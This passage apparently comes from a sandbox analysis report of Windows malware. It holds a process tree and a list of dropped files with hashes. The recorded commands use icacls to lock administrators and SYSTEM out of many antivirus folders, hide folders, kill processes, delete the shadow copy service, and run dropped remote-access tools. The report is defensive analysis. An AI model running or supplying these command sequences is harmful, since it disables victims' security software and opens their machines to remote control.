            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
            PID:5740
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
          PID:5928
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          PID:5424
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:2356
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
          PID:4388
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
            PID:5280
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
          PID:5640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
            PID:2276
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:4488
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
          PID:6032
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
          PID:5732
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
            PID:4412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
          PID:5372
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:6012
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:4764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:4384
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5124
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:4432
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:3584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:1560
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:4956
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
          PID:4436
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:5776
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5588
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5392
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:5828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
          PID:5536
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          PID:5444
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6024
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:4500
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5452
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:4392
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:6132
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            PID:4292
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5540
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:4712
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
          PID:4408
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:1704
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
          PID:4964
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
            PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:816
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5516
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
            PID:3152
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
          PID:5292
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
            PID:1456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
          PID:4880
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5720
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
          PID:5300
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
            PID:4696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:6000
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          PID:4936
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
            PID:5416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:4372
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5844
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          PID:5436
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:744
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
          PID:4228
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5572
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:5900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
          PID:6044
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 5 /NOBREAK
            Delays execution with timeout.exe
            PID:1120
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 3 /NOBREAK
            Delays execution with timeout.exe
            PID:5248
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM 1.exe /T /F
            Kills process with taskkill
            PID:5240
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM P.exe /T /F
            Kills process with taskkill
            PID:5060
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:5992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
          PID:3156
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM iediagcmd.exe /T /F
            Kills process with taskkill
            PID:1504
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5976
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
            PID:4916
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:400
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:4516
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\360\Total Security"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:4164
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5468
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360TotalSecurity
            Views/modifies file attributes
            PID:3540
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360safe
            Views/modifies file attributes
            PID:4008
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5628
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4100
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\Avira
            Views/modifies file attributes
            PID:5972
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5152
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Package Cache"
            Views/modifies file attributes
            PID:6068
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5932
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\ESET"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5440
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2864
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\ESET
            Views/modifies file attributes
            PID:5644
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5472
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5204
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:1164
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\AVAST Software"
            Views/modifies file attributes
            PID:5360
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6104
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
            Views/modifies file attributes
            PID:5448
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
            Views/modifies file attributes
            PID:5648
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6072
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4612
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\AdwCleaner"
            Views/modifies file attributes
            PID:5368
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:1616
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:4160
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5492
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "c:\programdata\Malwarebytes"
            Views/modifies file attributes
            PID:1816
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4112
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\MB3Install"
            Views/modifies file attributes
            PID:6028
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:204
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\KVRT_Data"
            Views/modifies file attributes
            PID:2404
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4996
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Norton"
            Views/modifies file attributes
            PID:5164
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4324
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Avg"
            Views/modifies file attributes
            PID:3792
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5924
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\grizzly"
            Views/modifies file attributes
            PID:5548
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5200
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Doctor Web"
            Views/modifies file attributes
            PID:4276
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5744
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Indus"
            Views/modifies file attributes
            PID:5696
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:3220
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\WINDOWS\McMwt"
            Drops file in Windows directory
            Views/modifies file attributes
            PID:5284
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4604
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
            PID:5504
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4464
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
            PID:4444
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            Delays execution with timeout.exe
            PID:5728
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4004
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
            PID:4216
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:2192
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5528
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
            Views/modifies file attributes
            PID:4968
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
            Views/modifies file attributes
            PID:5304
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
            Views/modifies file attributes
            PID:5784
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:2544
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:812
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:420
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe /tray
      Executes dropped EXE
      PID:760
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe
      Executes dropped EXE
      PID:2928
      • C:\ProgramData\Windows\rfusclient.exe
        C:\ProgramData\Windows\rfusclient.exe /tray
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        PID:3464
  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    PID:2080
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
    PID:4424
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Loads dropped DLL
    PID:5460

Network

MITRE ATT&CK Matrix

Replay Monitor

00:00 00:00

Downloads

  • C:\Program Files\Common Files\System\iediagcmd.exe
  • C:\Program Files\Common Files\System\iexplore.exe
  • C:\ProgramData\Microsoft\Intel\BLOCK.bat
  • C:\ProgramData\Microsoft\Intel\R8.exe
  • C:\ProgramData\Microsoft\Intel\taskhost.exe
  • C:\ProgramData\Microsoft\Intel\taskhost.exe
  • C:\ProgramData\Microsoft\Intel\wini.exe
  • C:\ProgramData\Microsoft\Intel\wini.exe
  • C:\ProgramData\RealtekHD\taskhostw.exe
  • C:\ProgramData\WindowsTask\winlogon.exe
    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\Windows\install.vbs
  • C:\ProgramData\Windows\reg1.reg
  • C:\ProgramData\Windows\reg2.reg
  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rutserv.exe
    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe
    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe
    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe
    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe
    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\vp8decoder.dll
    MD5

    88318158527985702f61d169434a4940

    SHA1

    3cc751ba256b5727eb0713aad6f554ff1e7bca57

    SHA256

    4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

    SHA512

    5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

  • C:\ProgramData\Windows\vp8encoder.dll
    MD5

    6298c0af3d1d563834a218a9cc9f54bd

    SHA1

    0185cd591e454ed072e5a5077b25c612f6849dc9

    SHA256

    81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

